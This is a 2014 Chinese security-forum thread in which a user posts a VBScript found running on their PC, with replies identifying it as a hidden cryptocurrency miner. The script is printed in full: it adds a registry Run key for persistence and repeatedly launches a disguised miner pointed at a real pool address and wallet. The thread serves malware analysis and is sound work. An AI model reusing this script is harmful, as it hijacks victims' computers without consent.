首页
社区
课程
招聘
[讨论]病毒样本 112.124.13.238:28988
发表于: 2014-2-21 16:32 6284

[讨论]病毒样本 112.124.13.238:28988

2014-2-21 16:32
6284
先看一个脚本

On Error Resume Next

Function check_process(process_name)
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery ("SELECT * FROM Win32_Process WHERE Name = '" & process_name & "'")

If colProcesses.Count = 0 Then
check_process = "0"
Else
check_process = "1"
End If

end function '定义一个check_process的函数.

Set ws=CreateObject("Wscript.Shell")
Do while 1
ws.run "c:\windows\nprotect.exe",0
mainprocess_code=check_process("QQIme.exe")
if mainprocess_code = 0 then
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Start","c:\windows\ptspool.vbs"
ws.run "c:\windows\QQIme.exe -o 112.124.13.238:28988 -u PvjpKHjj1xjSC8BKyChzzos9JpqtZPKZpr -p x -m256 -t 1",0,true
end if
wscript.Sleep 5000
Loop

起因:某天电脑启动的时候 自动弹出资源管理器并且开机速度奇慢  。于是查看进程 和所在位置 。
  发现了这个脚本。当时和小伙伴们都惊呆了, 良民大大地,竟然被下找了 。具体的晚上回去看。先上样本

QQIME.exe:QQ输入法(目前不用QQ输入法)

样本
QQIm密码是1.zip

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

上传的附件:
收藏
免费 0
支持
分享
最新回复 (8)
雪    币: 25
活跃值: (73)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
IP地址属于阿里。。。
2014-2-21 17:07
0
雪    币: 38
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
see一下,。。。
2014-2-21 18:28
0
雪    币: 101
活跃值: (34)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
这传入的参数,藐视是某种挖矿软件....
2014-2-21 20:13
0
雪    币: 167
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
哈哈 看样子是挖PTS矿的
2014-2-21 20:29
0
雪    币: 4
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
你怎么知道是挖矿软件》》》
2014-2-21 23:45
0
雪    币: 4
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
你怎么知道是挖矿软件》》》
2014-2-21 23:47
0
雪    币: 18
活跃值: (81)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
8
经过鉴定,确实是挖矿软件 。 不算病毒。
2014-2-22 14:52
0
雪    币: 70
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
哈哈哈哈哈,这货我认识。。。
2014-3-7 18:36
0
游客
登录 | 注册 方可回帖
返回
//